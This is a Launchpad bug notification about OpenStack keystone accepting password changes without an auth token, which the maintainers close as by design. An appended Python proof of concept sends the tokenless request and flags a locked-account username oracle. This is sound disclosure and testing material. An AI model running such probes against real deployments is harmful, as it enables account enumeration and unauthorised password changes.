This is by design. The change user password API does not require a token, mostly because a user whose password has expired would otherwise need an administrator to reset it, since they cannot authenticate to obtain a token.

If an attacker has a username and password, requiring a token to change the password does not really provide any additional security here; they can already log in and authenticate as that user. That PCI-DSS bug has a change in flight to no longer expose the AccountLocked exception to users, which should prevent the username oracle issue.

** Information type changed from Private Security to Public **

** Changed in: keystone
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1901902

Title:
  Authtoken not used when changing password through CLI

Status in OpenStack Identity (keystone):
  Invalid

Bug description:
  No valid X-Auth-Token is needed when changing the password of a user. The authentication depends only on the user ID and the original password:

    POST /identity/v3/users/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/password HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    User-Agent: python-keystoneclient
    Content-Length: 76

    {"user": {"password": "Password1234!", "original_password": "Password123!"}}

  The CLI adds an X-Auth-Token, but when it is removed, for example using a proxy, the request is still processed successfully. Even though this poses no direct risk (the ID and original password still have to be known by the attacker), it unnecessarily increases the attack surface and does not feel like an intended situation. Combined with some of the issues reported in:

  https://bugs.launchpad.net/keystone/+bug/1688137

  the risk of this issue increases.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1901902/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
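The behaviour the report describes (the password-change call succeeding with the X-Auth-Token header absent) is easy to reproduce without a proxy. The following is an added example for this page, not code from the bug report or from keystone itself: it builds the same POST /v3/users/{id}/password request the reporter captured, deliberately sends it with no token, and classifies the reply so that the response the comment above refers to (the AccountLocked exception surfacing to the caller, which is what makes the username oracle) is visible to the tester. It uses only the Python standard library. Assumptions not stated on the page: that a successful change returns 204, that a wrong original password returns 401, and that the locked-account reply is a 401 whose body contains the word "locked"; the base URL and user ID are placeholders.

```python
"""Reproduce Launchpad bug 1901902: change a keystone user's password
with NO X-Auth-Token header, and classify the server's reply.

Added example, not keystone's own code. Uses only the standard library.
"""
import json
import sys
import urllib.error
import urllib.request


def build_password_change_request(base_url, user_id, original_password, new_password):
    """Return (url, headers, body) for POST /v3/users/{id}/password.

    The headers intentionally contain no X-Auth-Token: the point of the
    report is that the call is authorised by user_id + original_password
    alone.  base_url is the keystone root, e.g. "http://host:5000" or
    "http://host/identity" for a devstack deployment (placeholder values).
    """
    url = f"{base_url.rstrip('/')}/v3/users/{user_id}/password"
    body = json.dumps(
        {"user": {"password": new_password, "original_password": original_password}}
    ).encode("utf-8")
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "repro-1901902",  # instead of python-keystoneclient
    }
    assert "X-Auth-Token" not in headers  # the whole point of the repro
    return url, headers, body


def classify_response(status, body_text):
    """Map an HTTP status and body to an outcome string.

    ASSUMPTIONS (not confirmed by the bug page): 204 means the password
    was changed, 401 means the original password was rejected, and a 401
    whose body mentions "locked" is keystone's AccountLocked exception
    leaking to the caller.  That last case is the username oracle the
    comment above says is being closed: a locked account answers
    differently from a merely wrong password, so an unauthenticated
    caller can tell which user IDs exist and are locked.
    """
    if status == 204:
        return "password_changed"
    if status == 401:
        if "locked" in body_text.lower():
            return "account_locked"  # distinguishable -> oracle
        return "bad_credentials"
    if status == 404:
        return "no_such_user"
    return f"unexpected_{status}"


def change_password_without_token(base_url, user_id, original_password, new_password):
    """Send the request and return the classified outcome (network call)."""
    url, headers, body = build_password_change_request(
        base_url, user_id, original_password, new_password
    )
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # usage: python repro.py http://host:5000 <user_id> <old_password> <new_password>
    if len(sys.argv) != 5:
        sys.exit(__doc__)
    print(change_password_without_token(*sys.argv[1:]))
```

Run it against a test deployment with a known user ID and password; a "password_changed" result with no token in the request confirms the behaviour the report describes (and, per the reply above, the intended design). If a locked test account yields "account_locked" rather than "bad_credentials", the oracle the comment mentions is still present on that build.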